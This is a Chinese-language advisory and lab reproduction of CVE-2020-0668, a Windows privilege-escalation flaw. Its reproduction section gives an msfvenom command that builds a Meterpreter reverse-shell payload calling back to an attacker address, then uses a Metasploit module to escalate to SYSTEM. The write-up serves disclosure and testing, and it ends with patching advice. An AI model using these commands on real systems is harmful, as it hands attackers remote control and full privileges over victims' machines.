CVE-2020-0668 Windows 本地提取漏洞
漏洞简介
Windows Service Tracing中的权限提升漏洞
发布时间 :2020-02-29
漏洞类型:Windows 权限提升
CVE编号:CVE-2020-0668
CNNVD-ID:CNNVD-202002-518
影响范围
• Windows 7
• Windows 8.1
• Windows RT 8.1
• Windows 10
• Windows Server 2008
• Windows Server 2008 R2
• Windows Server 2012
• Windows Server 2012 R2
• Windows Server 2016
• Windows Server 2019
• Windows 10版本1607
• Windows 10版本1709
• Windows 10版本1803
• Windows 10版本1809
• Windows 10版本1903
• Windows 10版本1909
• Windows Server版本1803
• Windows Server版本1903
• Windows Server版本1909
漏洞详情
Windows Service Tracing中的权限提升漏洞分析 CVE-2020-0668
https://www.freebuf.com/vuls/227557.html
漏洞复现
Metasploit 中已经更新该漏洞Exp - exploit/windows/local/cve_2020_0668_service_tracing
测试环境:
• Metasploit 6
• Windows10 (Build 18362)
一、生成Metasploit木马
这里有个小坑,生成时记得使用x64位Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.132 LPORT=6666 -f exe -o payload.exe
监听时记得也使用x64位Payload - windows/x64/meterpreter/reverse_tcp
二、执行木马上线Metasploit
创建一个普通用户,并登陆普通用户,运行木马上线。
然后执行bg,放入后台
三、利用CVE_2020_0668进行提权
直接加载脚本
use exploit/windows/local/cve_2020_0668_service_tracing
配置脚本
配置完成再开一个Metasploit监听4444端口,配置和上述脚本同样的Payload。
运行提权脚本
收到提权后的shell
查看权限 - System
提权成功
修复建议
及时更新系统或更新补丁
本文作者:重生信安-山石